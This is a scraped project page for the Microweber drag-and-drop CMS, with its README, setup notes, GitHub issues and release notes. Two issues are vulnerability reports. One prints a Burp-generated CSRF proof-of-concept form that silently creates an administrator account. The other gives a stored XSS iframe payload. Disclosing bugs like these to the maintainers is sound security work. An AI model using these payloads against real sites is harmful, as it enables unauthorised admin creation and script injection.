Drag and Drop Website Builder and CMS with E-commerce


Microweber: Drag-and-Drop CMS

Current version: 1.2 running on Laravel 8!

Download | What is Microweber? | Core features of Microweber | Requirements | Installation | Getting Started | Contribute

What is Microweber?

admin panel

Microweber is a Drag and Drop website builder and a powerful next generation CMS. It's based on the PHP Laravel Framework. You can use Microweber to make any kind of website, online store, and blog. The Drag and Drop technology allows you to build your website without any technical knowledge.

The core idea of the software is to let you create your own website, online shop or blog. From this moment of creation, your journey towards success begins. Supporting you along the way will be different modules, customizations and features of the CMS. Many of them are specifically tailored for e-commerce enthusiasts and bloggers.

The most important thing you need to know is that Microweber pairs the latest Drag & Drop technology, with a revolutionary Real-Time Text Writing & Editing feature. This pair of features delivers an improved user experience, easier and quicker content management, a visually appealing environment, and flexibility.

Core features of Microweber

Drag & Drop

Microweber implements Drag & Drop technology. This means that users can manage their content and arrange elements with just a click of the mouse, dragging and dropping them across the screen. Drag & Drop applies to all types of content: images, text fields, videos, and the various modules and customization options you have as a user. The default template “Dream” comes with more than 75+ prepared layouts that you can use via drag and drop.

Drag And Drop

Real Time Text Editing

Live Edit view is the manifestation of the Real-Time Text Writing & Editing core feature of Microweber CMS. Live Edit view changes your website’s interface in real time.

E-commerce solution

Powerful Admin Panel

You can add dynamic pages, posts, and products. All of these can be organized in custom categories in order to achieve a better navigation and showcase of a website's content. New pages can be created using different layouts. In addition, all pages, posts and products come with a number of preset layouts and modules to get users started. These modules can be changed and you can add your own custom set of modules in order to create the most suitable content for your needs.

Powerful Admin Panel

E-commerce Solution

The main focus of Microweber CMS is E-commerce. A rising number of people have grown fond of the idea of online entrepreneurship and we aspire to cover their needs. The software has some built-in features that will help online shop founders see their business grow and excel.

E-commerce Solution

Give a star to Microweber

See it in action


  • HTTP server
  • Database server
  • PHP >= 5.6
    • lib-xml must be enabled (with DOM support)
    • GD PHP extension

HTTP Server


The mod_rewrite module must be enabled in your Apache configuration. Microweber creates the necessary .htaccess files during installation, including one with Deny All directive in each folder to ensure that there are no entry points other than index.php.


Add this location directive to your server configuration block. The root directive must point to the base folder of your Microweber website (which by default is where this readme is located).

server {
  location / {
    try_files $uri $uri/ /index.php$is_args$args;


You can easily import the .htaccess rewrite rules. Make sure you have enabled the URL Rewrite module for your website.


You have several choices for database engine: MySQL, SQLite, Microsoft SQL Server and PostgreSQL. For small websites we highly recommend SQLite. However, you can connect to more storage services (like MongoDB or Neo4j) and take advantage of the Laravel framework.

On the installation screen you can only choose from databases enabled in your PHP configuration. If you don't see your server of choice in the list you have to enable the corresponding PDO extension for your database server. An example for Microsoft SQL Server. PHP usually comes with PDO enabled by default but you might have to uncomment or add extension directives to your php.ini.


The fast way: Download and unzip.

Via Composer

Installing dependencies

You need to have Composer installed in order to download Microweber's dependencies.

You can clone and install Microweber with one command:

composer create-project microweber/microweber my_site dev-master --prefer-dist --no-dev

This will install Microweber in a folder named my_site.

Another way is to first clone the repository and then run composer install in the base directory.

File permissions

Make sure these folders, and everything inside, is writeable by the user executing the PHP scripts:

  • config/
  • src/
  • storage/
  • userfiles/

Getting Started

See the online guides for developers.


We are looking for people who want to help us improve Microweber.

If you are a developer, submitting fixes is easy. Just fork the Microweber repository, make your changes, submit a pull request, and be sure all tests are passing.

Build Status

Build Status


Code Contributors

This project exists thanks to all the people who contribute. [Contribute].

Financial Contributors

Become a financial contributor and help us sustain our community. [Contribute]



Support this project with your organization. Your logo will show up here with a link to your website. [Contribute]

  • Error when i use shortcuts for publish a page

    Error when i use shortcuts for publish a page

    Hi, When i use link in left, or in last edit pages for publish a page unpublished, a message says "your page is published" but when i reload page it's not true. Buttons call ajax, and there is an error :


    The api function api is not defined in the allowed functions list

    Thanks, Jérémy

    opened by Jerem87 38
  • Calendar Module (question)

    Calendar Module (question)

    I'm trying to create a calendar module and need the module install to create a new database table. The $config['tables'] parameter in the module config.php file allows the table name, field names, and field types to be defined in an array, which function _exec_table_builder in Providers\Database\Utils.php processes to create the table and fields. Is there a way to define field lengths, auto-increment, and indexes?

    opened by Ezyweb-uk 35
  • Microweber in FreeBSD jail with PHP-FPM and Nginx in FastCGI mode behind Nginx reverse proxy in different jail

    Microweber in FreeBSD jail with PHP-FPM and Nginx in FastCGI mode behind Nginx reverse proxy in different jail

    Dear All, I seem to have a really weird problem that I have not been able to solve and never encountered with other PHP applications: I have installed Microweber in a FreeBSD jail (if you are not familiar with FreeBSD and jails, just consider them different servers), and can access the instance happily, with all graphics and templates showing up. Yes - your Nginx settings have been set in accordance to what is found here: https://github.com/alvsgithub/microweber I run the application server behind a caching reverse proxy using Nginx, and with PHP I usually need nothing but this:

    # handle default location
    location                        / {
        # naxsi rules, apply to / as first configuration entry
        include                     naxsi_default.rules;
        # enable proxy cache
        proxy_cache                 microweber_proxy_cache;
        expires                     7d;
        # try to serve static files from Nginx
        try_files                   $uri @microweber;
    location                        @microweber {
        proxy_pass                  http://www_php.jail.vlan:[microweber application port];

    And things work like a charm. However, this is not the case with Microweber: PHP code is indeed displayed, but all assets do not show up, means I get a raw page. However, all assets are accessible, so this is not a permission issue. Does Microweber deal with assets and templates and such in a somewhat special way that requires my to add in more details into the Nginx reverse proxy configuration? Thank you so much for your help, Chris

    opened by chlarsen 26
  • Registration e-mail text cannot be edited

    Registration e-mail text cannot be edited

    http://snag.gy/hlwo2.jpg This should definitely be editable here. Also, the subject input is way too small, width: 100% would be much better and more suitable to most people.

    opened by jurchiks 20
  • Multi site configuration issue

    Multi site configuration issue

    The document's "Multi site configuration" section seams outdated. http://microweber.com/docs/developer-guide/installation/configuration There is no src/Microweber/bootstrap.php file in branch1.0 now. and also config.php does not exist. In 1.0 branch, only need to edit database.php for a new install. So, how can i add multi site configuration for branch 1.0? Thanks.

    opened by ossplus 17
  • Requirement list incomplete

    Requirement list incomplete

    Your requirement list in the README shows only a couple of PHP requirements, but what about all the Bower/Gulp/NPM stuff? Obviously, for just running it, PHP is enough, but I will probably have to make my own design and add some functionality, so I would like to know what exactly I will need to achieve this.

    opened by jurchiks 13
  • Category saving is failing

    Category saving is failing

    When I'm creating an category it fails because of empty columns:

    SQLSTATE[HY000]: General error: 1366 Incorrect integer value: '' for column 'position' at row 1 (SQL: insert into `mytest_pt_categories` (`rel_id`, `data_type`, `parent_id`, `title`, `position`, `description`, `users_can_create_content`, `rel_type`, `is_deleted`, `created_at`, `updated_at`, `created_by`, `edited_by`) values (5, category, 0, test, , , 0, content, 0, 2015-03-28 15:52:18, 2015-03-28 15:52:18, 1, 1))

    Looking at stack trace, the content is being passed as empty string '':

    at Connection->runQueryCallback('insert into `chezmoi_pt_categories` (`rel_id`, `data_type`, `parent_id`, `title`, `position`, `description`, `users_can_create_content`, `rel_type`, `is_deleted`, `created_at`, `updated_at`, `created_by`, `edited_by`) values (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)', array('5', 'category', '0', 'Bazinga', '', '', '0', 'content', '0', '2015-03-28 15:52:18', '2015-03-28 15:52:18', '1', '1'), object(Closure)) in Connection.php line 570

    AFAICT it's expecting a 0 (zero).

    I'm using latest v1 (with https://github.com/microweber/microweber/commit/6f3dd9a5f05a9d8b22ea9fbf0147249d0158a55b)

    opened by mloureiro 13
  • There is a CSRF vulnerability that can add the administrator account

    There is a CSRF vulnerability that can add the administrator account

    After the administrator logged in, open the following page to add an administrator. POC:

      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <script>history.pushState('', '', '/')</script>
        <form action="http://demo1.microweber.com/api/save_user" method="POST">
          <input type="hidden" name="id" value="0" />
          <input type="hidden" name="thumbnail" value="" />
          <input type="hidden" name="username" value="3333" />
          <input type="hidden" name="password" value="123456" />
          <input type="hidden" name="email" value="3333&#64;qq&#46;com" />
          <input type="hidden" name="first&#95;name" value="222" />
          <input type="hidden" name="last&#95;name" value="222" />
          <input type="hidden" name="is&#95;active" value="1" />
          <input type="hidden" name="is&#95;admin" value="1" />
          <input type="hidden" name="basic&#95;mode" value="1" />
          <input type="hidden" name="api&#95;key" value="15" />
          <input type="submit" value="Submit request" />
    opened by AutismJH 9
  • Remove some elements

    Remove some elements

    Hi, I try to remove your "team" layout in toolbar. I deleted files in userfiles/elements, but they are still display in toolbar. I found interface for elements (admin/view:elements) but click on reload elements don't fix my problem. viewelements Have you an idea ? Thanks, Jérémy

    opened by Jerem87 9
  • Stored Cross-site Scripting (XSS)

    Stored Cross-site Scripting (XSS)


    An attacker can gain arbitrary execution of javascript code using the edit function in the page editor.

    Steps to reproduce:

    1. Log in and navigate to a page to edit
    2. Click on the insert menu, and click HTML. You will get prompted to enter some HTML code
    3. Insert the following payload: <iframe src="javascript:alert(1)"></iframe>
    4. Visit the page and observer an alert box pop up.
    opened by prodigysml 8
  • Contact form and Test email gives error 500

    Contact form and Test email gives error 500

    I'm using version 1.0.7 and I'm getting error 500 when submitting the contact form or test email (in settings). I see in userfiles/modules/settings/group/email.php there is a reference to api_html/Microweber/Utils/MailSender/test the closest I can find to this is /src/Microweber/Utils/MailSender.php

    opened by Ezyweb-uk 8
  • whmcs no connect ERROR

    whmcs no connect ERROR


    I did all the installation procedure in Digital Ocean and entered the whitelabel license worth 20.00 per month

    and go up and activated and configured the module in my WHMCS but when I try to connect the api key in the Microweber Module (WhiteLabel) it returns the error below.

    when saved he returns the error below

    ERROR: Attempt to read property "message" on array

    What can I do to fix it?

    I look forward to hearing from you.

    Thank you



    opened by danilorcsilva 0
  • Quotes from translation are not escaped in userfiles/modules/shop/taxes/admin.php

    Quotes from translation are not escaped in userfiles/modules/shop/taxes/admin.php

    Hi, The quotes are not escaped which causes a js error when accessing the tax management. image image https://github.com/microweber/microweber/blob/5f201c9447ed5fb6f33a280722ceafe9c29ec887/userfiles/modules/shop/taxes/admin.php#L25 https://github.com/microweber/microweber/blob/5f201c9447ed5fb6f33a280722ceafe9c29ec887/userfiles/modules/shop/taxes/admin.php#L27

    Other parts of the code are probably affected. maybe also revise the other modules

    opened by LeuZeuS 0
  • server error 500 after installation

    server error 500 after installation


    in [/var/www/microweber/vendor/nesbot/carbon/src/Carbon/Traits/Creator.php ]( 928) * * @param array $lastErrors * * @return void */ private static function setLastErrors(array $lastErrors) { static::$lastErrors = $lastErrors; } /** in [/var/www/microweber/vendor/nesbot/carbon/src/Carbon/Traits/Creator.php ]( setLastErrors (line 98) if (isset($locale)) { setlocale(LC_NUMERIC, $locale); // @codeCoverageIgnore } self::setLastErrors(parent::getLastErrors()); } /** * Get timezone from a datetime instance. * in [/var/www/microweber/vendor/nesbot/carbon/src/Carbon/Traits/Creator.php ](> __construct (line 252) * * @return static */ public static function now($tz = null) { return new static(null, $tz); } /** * Create a Carbon instance for today. * in [/var/www/microweber/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php ]( now (line 259) protected function getCookieExpirationDate() { $config = $this->manager->getSessionConfig(); return $config['expire_on_close'] ? 0 : Date::instance( Carbon::now()->addRealMinutes($config['lifetime']) ); } /** * Determine if a session driver has been configured. in [/var/www/microweber/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php ](> getCookieExpirationDate (line 221) */ protected function addCookieToResponse(Response $response, Session $session) { if ($this->sessionIsPersistent($config = $this->manager->getSessionConfig())) { $response->headers->setCookie(new Cookie( $session->getName(), $session->getId(), $this->getCookieExpirationDate(), $config['path'], $config['domain'], $config['secure'] ?? false, $config['http_only'] ?? true, false, $config['same_site'] ?? null )); } } in [/var/www/microweber/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php ](> addCookieToResponse (line 125) $response = $next($request); $this->storeCurrentUrl($request, $session); $this->addCookieToResponse($response, $session); // Again, if the session has been configured we will need to close out the session // so that the attributes may be persisted to some storage medium. We will also // add the session identifier cookie to the application response headers now. $this->saveSession($request); in [/var/www/microweber/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php ](> handleStatefulRequest (line 64) if ($this->manager->shouldBlock() || ($request->route() instanceof Route && $request->route()->locksFor())) { return $this->handleRequestWhileBlocking($request, $session, $next); } return $this->handleStatefulRequest($request, $session, $next); } /** * Handle the given request within session state. * StartSession->handle() in [/var/www/microweber/src/MicroweberPackages/App/Http/Middleware/StartSessionExtended.php ]( 22) * @param \Closure $next * @return mixed */ public function handle($request, Closure $next) { return parent::handle($request, $next); // defer to the right stuff } /** * Store the current URL for the request if necessary. * in [/var/www/microweber/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php ](> handle (line 167) // since the object we're given was already a fully instantiated object. $parameters = [$passable, $stack]; } $carry = method_exists($pipe, $this->method) ? $pipe->{$this->method}(...$parameters) : $pipe(...$parameters); return $this->handleCarry($carry); } catch (Throwable $e) { return $this->handleException($passable, $e); in [/var/www/microweber/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TransformsRequest.php ](> Illuminate\Pipeline\{closure} (line 21) */ public function handle($request, Closure $next) { $this->clean($request); return $next($request); } /** * Clean the request's data. * in [/var/www/microweber/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/ConvertEmptyStringsToNull.php ](> handle (line 31) if ($callback($request)) { return $next($request); } } return parent::handle($request, $next); } /** * Transform the given value. * in [/var/www/microweber/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php ](> handle (line 167) // since the object we're given was already a fully instantiated object. $parameters = [$passable, $stack]; } $carry = method_exists($pipe, $this->method) ? $pipe->{$this->method}(...$parameters) : $pipe(...$parameters); return $this->handleCarry($carry); } catch (Throwable $e) { return $this->handleException($passable, $e); in [/var/www/microweber/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/AddQueuedCookiesToResponse.php ](> Illuminate\Pipeline\{closure} (line 37) * @param \Closure $next * @return mixed */ public function handle($request, Closure $next) { $response = $next($request); foreach ($this->cookies->getQueuedCookies() as $cookie) { $response->headers->setCookie($cookie); } in [/var/www/microweber/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php ](> handle (line 167) // since the object we're given was already a fully instantiated object. $parameters = [$passable, $stack]; } $carry = method_exists($pipe, $this->method) ? $pipe->{$this->method}(...$parameters) : $pipe(...$parameters); return $this->handleCarry($carry); } catch (Throwable $e) { return $this->handleException($passable, $e); in [/var/www/microweber/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php ](> Illuminate\Pipeline\{closure} (line 103) { $pipeline = array_reduce( array_reverse($this->pipes()), $this->carry(), $this->prepareDestination($destination) ); return $pipeline($this->passable); } /** * Run the pipeline and return the result. * in [/var/www/microweber/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php ](> then (line 142) $this->bootstrap(); return (new Pipeline($this->app)) ->send($request) ->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware) ->then($this->dispatchToRouter()); } /** * Bootstrap the application for HTTP requests. * in [/var/www/microweber/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php ](> sendRequestThroughRouter (line 111) public function handle($request) { try { $request->enableHttpMethodParameterOverride(); $response = $this->sendRequestThroughRouter($request); } catch (Throwable $e) { $this->reportException($e); $response = $this->renderException($request, $e); } Kernel->handle() in [/var/www/microweber/index.php ]( 93) |*/$kernel = $app->make('Illuminate\Contracts\Http\Kernel');$response = $kernel->handle( $request = Illuminate\Http\Request::capture());$response->send();

    opened by cmacsauto 1
  • Retrieving the value of a custom field from a content does'nt work

    Retrieving the value of a custom field from a content does'nt work

    There is a bug when calling the getValue method. Get sometimes the wrong value, mw()->fields_manager->getValue($item['id'], 'mycustomfields'); https://github.com/microweber/microweber/blame/2737bc0076e9e56b7565be45afc013eb7763885d/src/Microweber/Providers/FieldsManager.php#L323 The condition after 'OR' need to be corrected

    opened by LeuZeuS 1
  • mbstring requirement missing in docs

    mbstring requirement missing in docs

    Mbstring must be present in requirements. Trying to run microweber without it installed and enabled will result in error: PHP Fatal error: Uncaught ReflectionException: Class "config" does not exist [...]

    This is probably caused by laravel requiring this extension. Gave me quite a headache this morning.

    opened by JKratto 0
  • v1.3.1(Aug 12, 2022)

  • v1.3.0(Jul 21, 2022)

  • v1.2.21(Jul 18, 2022)

  • v1.2.20(Jul 9, 2022)

  • v1.2.19(Jul 4, 2022)

    [1.2.19] - 2022-07-04

    • Fixed files uploading, now requires a valid XSRF token.
    • Fixed artisan command names and arguments are now with dash instead of underscore
    • Fixed external URL redirect on logout, while providing username and password in the URL.
    • Fixed toggle of notifications accordion was broken due Bootstrap 5 migration
    • Fixed bug related to image resizing in live edit.
    • Fixed twitter feed was not loading when you reload the module by JS.
    • Added ability for the code editor to pop-out in new window.
    • Added icons in the DOM tree in live edit for easier identification of elements.
    • Other fixes
    • see all changes....
    Source code(tar.gz)
    Source code(zip)
  • v1.2.18(Jun 22, 2022)

    [1.2.18] - 2022-06-22

    • Fixed unpublished products that were shown on frontend
    • Fixed empty CSS properties are removed when you reset the element from live edit
    • Fixed mail sending, when using Laravel config
    • Other fixes
    • see all changes....
    Source code(tar.gz)
    Source code(zip)
  • v1.2.17(Jun 14, 2022)

  • v1.2.16(Jun 9, 2022)

    [1.2.16] - 2022-06-09

    • Fixed more RTL issues
    • Fixed translation issues on the slider module
    • Fixed PNG anf GIF image transparency issue
    • Fixed Twitter feed module
    • Fixed contact form not accepting terms and conditions
    • Translations update
    • Security fixes
    • Other fixes
    • see all changes....
    Source code(tar.gz)
    Source code(zip)
  • v1.2.15(Apr 29, 2022)

    [1.2.15] - 2022-04-29

    • Added new free template based on Bootstrap 5
    • Added support for inline svg in live edit
    • Added support animations in live edit
    • Fixed contact form not sending email, when disable mail saving option is enabled
    • Security fixes
    • Other fixes
    • see all changes....
    Source code(tar.gz)
    Source code(zip)
  • v1.2.14(Apr 14, 2022)

  • v1.2.13(Apr 4, 2022)

  • v1.2.12(Mar 22, 2022)

  • v1.2.11(Feb 19, 2022)

  • v1.2.10(Dec 8, 2021)

    [1.2.10] - 2021-12-08

    • Fixes on live edit
    • Fixes on multi language
    • Fixes on coupon codes module
    • Fixes on sitemap and rss feeds
    • Fixes on categories module
    • Fixes on comments module
    • Fixes on paypal module
    • Fixes on forgot password
    • Added Laravel Dusk tests
    • Some code refactoring
    • Many other fixes
    • see all changes....
    Source code(tar.gz)
    Source code(zip)
  • v1.2.9(Sep 20, 2021)

    [1.2.9] - 2021-09-20

    • Updated Laravel to 8.61
    • Fixes on the loading speed
    • Fixes on the security
    • Fixes on live edit
    • Added service provider for templates
    • Added new repository classes
    • Added multilanguage module
    • Added new icons for modules
    • Many other fixes
    • see all changes....
    Source code(tar.gz)
    Source code(zip)
  • v1.2.8(Jul 9, 2021)

    [1.2.8] - 2021-07-08

    • Updated Laravel to 8.4
    • Fixes on custom fields
    • Fixes on thumbnails
    • Added new blog module
    • Added new shop module
    • Added ability for shop and blog to have filters
    • Added new template for shops
    • Migrated the default template to Bootstrap 5
    • Other fixes
    • see all changes....
    Source code(tar.gz)
    Source code(zip)
  • v1.2.7(May 15, 2021)

    [1.2.7] - 2021-05-14

    • Fixes on checkout module
    • Fixes on marketplace module
    • Fixes on categories module
    • Fixes database connection not being closed sometimes
    • Added content revisions module for live edit
    • Added ability for menu module to return data
    • Added svg support
    • Other fixes
    • see all changes....
    Source code(tar.gz)
    Source code(zip)
  • v1.2.6(Apr 29, 2021)

    [1.2.6] - 2021-04-29

    • Fixes on the checkout module
    • Fixes on the tags module
    • Fixes on offers module
    • Fixes on the package manager
    • Fixes on link editor
    • Added content revisions module for live edit
    • Added webp support
    • Other fixes
    • see all changes....
    Source code(tar.gz)
    Source code(zip)
  • v1.2.5(Apr 15, 2021)

  • v1.2.4(Apr 13, 2021)

    [1.2.4] - 2021-04-12

    • UI Fixes on mobile
    • Live edit fixes
    • Fix CSS editor tools
    • Fix Https not work properly with Full page cache
    • Fix stats display bug for period more than year
    • Added new translatable option fields
    • Added new default checkout page
    • Other fixes
    • see all changes....
    Source code(tar.gz)
    Source code(zip)
  • v1.2.3(Mar 30, 2021)

    [1.2.3] - 2021-03-30

    • Update to Laravel 8.3
    • Fix Tags problem
    • Fix Offer price
    • Fix Contact form bugs
    • Fix Multilanguage bugs
    • Fix https bug behind proxy
    • Fix Live edit bugs linking to layout
    • Fix Live edit bugs related to cloudflare caching
    • Added new elements for live edit
    • Other fixes
    • see all changes....
    Source code(tar.gz)
    Source code(zip)
  • 1.0.7-fix1(Mar 1, 2016)

    Vendor: added Omnipay library Vendor: added coduo/php-humanizer library Vendor: added league/csv library Added: taxes support Added: caching with .htaccess on some folders Added: payment providers (Mollie,Stripe and Authorize.net) Added: taxes support Added: url support for categories Added: crud class Added: custom field type "property" Added: "max depth" setting to the categories module Added: Portuguese language Added: LinkedIn login Added: export orders to CSV Refactor: database classes Refactor: content manager Refactor: shop classes Refactor: categories classes Fix: general UI improvements Fix: security fixes Fix: bugfixes in custom fields Fix: bugfixes drag and drop Fix: thumbnail resize fix Fix: fixed dropdown bug when you click on the scroll Fix: mw.tooltip issues Fix: mw.modal issues Fix: sitemap and rss feed Fix: performance improvements when there are many categories Fix: cache files number reduced Fix: fix of notifications Fix: fix of import module Many other fixes

    Source code(tar.gz)
    Source code(zip)
    microweber-1.0.7.update.zip(13.59 MB)
    microweber-1.0.7.zip(21.05 MB)
  • 1.0.6(Nov 19, 2015)

    Added: taxes support Added: tabs module Added: twig parser to shop email template Added: content revisions (for new installs only) Added: data fields support for categories Added: country states class Added: .allow-drop css class on live-edit field to allow dropping inside modules Added: custom reset password email Added: custom register user email Refactor: cart moved to own class Refactor: orders moved to own class Refactor: content data fields moved to own class Refactor: content attributes moved to own class Fix: search function to exclude deleted content #313 Fix: uploader makes all files lowercase Fix: live edit fixes on columns Fix: forms module export to excel Fix: Unzip was making all files lowercase Fix: URLs are now sequential Vendor: added Twig parser Other fixes

    Source code(tar.gz)
    Source code(zip)
  • 1.0.5-fix1(Oct 20, 2015)

  • 1.0.5(Oct 13, 2015)

    Added: Custom content fields now can be added from the template config file Added: Session-less routes and Middleware Added: Various UI hooks Added: Support for custom data fields Added: Cache driver support (Files, APC) Added: Template class Added: Caching option for apijs and frontend assets Added: Picture browser Fix: parser was outputting the same content in different edit fields with same attrs Fix: module id is now generated with md5 instead with crc32 Fix: is_home bug under sqlite Fix: install bug Fix: shipping to country bug with the select menu Fix: custom field default values were showing 0 Fix: editor improvements Fix: menu reorder bug Fix: google fonts loading Fix: facebook login bug Fix: mw.front event was called before constants are defined Fix: bug in image cropping Fix: ConfigSave now replaces the storage_path Fix: shipping bug Fix: undo is now working properly Fix: preg_replace bug Fix: icon picker Fix: save edit now uses MutationObserver Fix: category reordering Fix: live edit changes were not saved when editing an image Fix: pixum now caches the images Fix: drag and drop in row was appending the item on the wrong place Fix: upload image shows progress again Fix: resizable columns bug when no width is set Fix: redirect in views and modules was not working Fix: updated jquery-ui to 1.11.4 Fix: captcha is now working on pages with multiple captchas Fix: upload file bug Fix: default controller's render logic now moved in the template class Many other fixes

    Source code(tar.gz)
    Source code(zip)
  • 1.0.4-fixed(Aug 4, 2015)

    [1.0.4-fixed] - 2015-08-06

    Vendor: updated guzzle to 5.0 Fix: social login bug during outdated socilaite Fix: checkout bug caused by the SQL refactoring in 1.0.4

    [1.0.4] - 2015-08-04

    Vendor: added Laravel HTML helper class Vendor: updated jquery ui Added: template manager class Added: XSS filter class Added: artisan microwber:update command Fix: security fix in uploader Fix: security fix user creation Fix: editing menus bug Fix: delete abandoned cart Fix: query pagination was skipping pages Fix: menu title was outputting html tags Fix: menu module bug when editing Fix: add to cart with quantity parameter Fix: cache now uses locale prefix Fix: updated raw SQL queries to use Eloquent Fix: redirect bug when using redirect from template Fix: UI in forms module in admin Fix: captcha validation when there are multiple catchas on one page Fix: module id was random when using module inside module Fix: other small bugs

    Source code(tar.gz)
    Source code(zip)
  • 1.0.3(Jun 16, 2015)

    Changes from vesrion 1.0

    Vendor: Updated Laravel to v5.0.33 (last version that supports php 5.4) Feature: Custom fonts support (only Google fonts for now) Feature: Color picker can set custom color from hash Feature: CSS Editor Feature: Icon picker Feature: Custom font size value can be set Fix: improvements in the live edit for Boostrap3 templates Fix: possible XSS in users Fix: fixes in shop orders management Fix: many other minor bugs Added: get_category_items_count function Added: Some missing language entries Added: sum parameter to the db_get function Added: connection_name parameter to the db_get function Changed: replaced database class with database_manager Fix: shop currency function timeout Fix: modal initialization Fix: update check Fix: install problem under mysql 5.6 Fix: drop in bootstrap columns Fix: improvements for bootstrap themes Fix: edit link from live edit Fix: cart shipping price display Fix: shipping cost per weight Fix: price bug Fix: shipping cost per weight Fix: locale now uses App::getLocale() Vendor: added Omnipay for payments processing Vendor: Markdown provider Added: added option to change the currency sign position Fix: Custom environment name respects the getenv value Fix: Cache expiration Fix: Category delete Fix: Position db field is now converted to integer Fix: Delete categories bug Fix: Reorder categories bug Fix: Factored DB class Tests added Many other fixes

    Source code(tar.gz)
    Source code(zip)
  • 0.951(Jan 14, 2015)

  • 0.934(Aug 4, 2014)

BaiCloud-cms is a powerful open source CMS that allows you to create professional websites and scalable web applications. Visit the project website for more information.

BaiCloud-cms About BaiCloud-cms is a powerful open source CMS that allows you to create professional websites and scalable web applications. Visit the

null 5 Aug 15, 2022
Bismuth CMS is a ready-made Website CMS based on Yii 2 Advance Template

Bismuth CMS is a ready-made Website CMS based on Yii 2 Advance Template, it's the simplest and easy to set up CMS you may come across.

Hamadas Telebrain 1 Feb 11, 2022
Baicloud CMS is a lightweight content management system (CMS) based on PHP and MySQL and running on Linux, windows and other platforms

BaiCloud-cms About BaiCloud-cms is a powerful open source CMS that allows you to create professional websites and scalable web applications. Visit the

null 5 Aug 15, 2022
GetSimple CMS - a flatfile CMS that works fast and efficient and has the best UI around, it is written in PHP

GetSimple CMS is a flatfile CMS that works fast and efficient and has the best UI around, it is written in PHP.

null 370 Dec 30, 2022
Flextype is an open-source Hybrid Content Management System with the freedom of a headless CMS and with the full functionality of a traditional CMS

Flextype is an open-source Hybrid Content Management System with the freedom of a headless CMS and with the full functionality of a traditional CMS. Building this Content Management System, we focused on simplicity. To achieve this, we implemented a simple but powerful API's.

Flextype 524 Dec 30, 2022
NukeViet 132 Nov 27, 2022
Bootstrap CMS - PHP CMS powered by Laravel 5 and Sentry

Bootstrap CMS Bootstrap CMS was created by, and is maintained by Graham Campbell, and is a PHP CMS powered by Laravel 5.1 and Sentry. It utilises many

Bootstrap CMS 2.5k Dec 27, 2022
Soosyze CMS is a minimalist content management system in PHP, without database to create and manage your website easily

Soosyze CMS is a content management system without a database. It's easy to create and manage you

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Lara-zeus sky is simple CMS for your website. it include posts, pages, tags, and categories.

Lara Zeus Sky Lara-zeus sky is simple CMS for your website. it include posts, pages, tags, and categories. small tasks can be time-consuming, let us b

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PHPVibe Open source video CMS / Video Sharing CMS / Youtube Api v3 / Video Embeds

PHPVibe Video CMS Free Video Sharing CMS The modern choice of design inspired by Youtube and a social videos sharing module that may just cut it for y

MediaVibe 71 Dec 18, 2022
Doptor CMS is a Laravel 5 based CMS

Introduction Doptor CMS is a Laravel 5 based CMS. Find out more about Doptor by reading below. ;) About Doptor CMS Doptor is an Integrated and well-de

DOPTOR 4 Sep 11, 2022
Amila Laravel CMS - Free, open-source Simple Bootstrap Laravel CMS

Simple Bootstrap Laravel CMS. Support Laravel 8.x Can integrate into any existing Laravel project. Only add few database tables with prefixes, not affect your existing database tables. Support Laravel 7.x & Laravel 6.x & Laravel 5.x & MySql & PostgreSql - Amila Laravel CMS

Alex Zeng 96 Sep 6, 2022
Aimeos is THE professional, full-featured and ultra fast e-commerce package for Laravel 5 and 6

Aimeos is THE professional, full-featured and ultra fast e-commerce package for Laravel 5 and 6! You can install it in your existing Laravel application within 5 minutes and can adapt, extend, overwrite and customize anything to your needs.

Aimeos 5.9k Jan 2, 2023
🦉 Administrative interface builder for Laravel (Laravel admin)

Laravel Admin Panel SleepingOwl SleepingOwl Admin is an administrative interface builder for Laravel. Completely free Support Laravel > 5.5 - 5.8 (PHP

Laravel Framework Russian Community 746 Jan 4, 2023
igniCMS is an administrative interface builder for Laravel 5.6.

igniCMS is an administrative interface builder for Laravel 5.6.

Despark Bulgaria EAD 13 Nov 4, 2022
Twill is an open source CMS toolkit for Laravel that helps developers rapidly create a custom admin console that is intuitive, powerful and flexible. /// Chat with us and others on Spectrum: https://spectrum.chat/twill

About Twill Twill is an open source Laravel package that helps developers rapidly create a custom CMS that is beautiful, powerful, and flexible. By st

AREA 17 3k Jan 6, 2023
A flexible and fast Cms built with Symfony and Vuejs.

GreenCheap CMS A modular and lightweight CMS made with Symfony and Vuejs components GreenCheap works with PHP 8 version. In this case, lower versions

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Icônes Form Widget for October and winter CMS. One library, over 100,000 vector icons, and 108+ icon sets powered by Iconify

Icônes Form Widget ?? ?? ?? Access thousands of SVG icons as a backend form widget. One library, over 100,000 vector icons, Modern replacement for ico

Adil Chehabi 12 Aug 29, 2022